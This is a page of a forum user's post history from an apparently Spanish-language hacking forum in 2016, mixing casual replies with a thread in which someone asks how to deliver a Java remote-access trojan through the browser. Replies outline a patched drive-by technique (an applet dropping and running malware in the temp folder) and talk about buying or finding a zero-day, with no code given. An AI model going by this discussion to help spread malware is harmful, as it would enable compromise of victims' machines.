Para mi está limpio, si pudieras decirnos exactamente que hace, quizás podría averiguar algo más.

Saludos.

#615

Dudas y pedidos generales / Re:¿Podéis analizar este archivo?

Julio 01, 2016, 07:25:19 AM

Analizando...

Un saludo,

Blackdrake

#616

Off Topic / Re:Feliz cumpleaños Hira!

Junio 30, 2016, 04:45:06 PM

Felicidades a Hira y enhorabuena por todo lo conseguido este año, les deseo muchos éxitos, seguir trabajando duro chicos!

Un saludo.

#617

Dudas y pedidos generales / Re:[Pedido]Web's de descarga.

Junio 27, 2016, 10:11:21 AM

Yo para peliculas y series uso You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (es descarga directa/online, quizás te sirva, prácticamente es como el antiguo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)

Saludos.

#618

Galería / Re:Wallpaper Underc0de

Junio 27, 2016, 12:35:27 AM

Si lo subes con mejor resolución lo utilizo como fondo de pantalla! Gran trabajo, me encató!

Saludos.

#619

Dudas y pedidos generales / Re:Consulta RAT Java

Junio 27, 2016, 12:29:27 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola,

De forma pública no hay nada.. No se si existirá algun exploit privado que explote alguna falla java del navegador.
Y si la existe, debe ser muy, pero muy costosa. Estamos hablando de unos 2.000 - 2.500 usd

Saludos,
ANTRAX

Demasiado barato lo veo, una vulnerabilidad de ese tipo podría venderse bastante más cara.

Saludos.

#620

Dudas y pedidos generales / Re:Consulta RAT Java

Junio 26, 2016, 04:23:23 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lamentablemente llegas tarde a la fiesta ya está parcheado java by_drive ,lo que hacía era colocar un applet en el código html que lo que hacía era llamar a un archivo java, el cual obtenía el path a tu carpeta %TMP% normalmente y transfería el malware y lo ejecutaba en %TEMP%

Sisi lo se, pero pregunto si hoy en dia hay alguna otra manera o tecnica. gracias por responder!

Maneras existen, por ejemplo, encontrando un 0 day

Saludos.

Páginas 1 ... 29 30 31 32 33 ... 97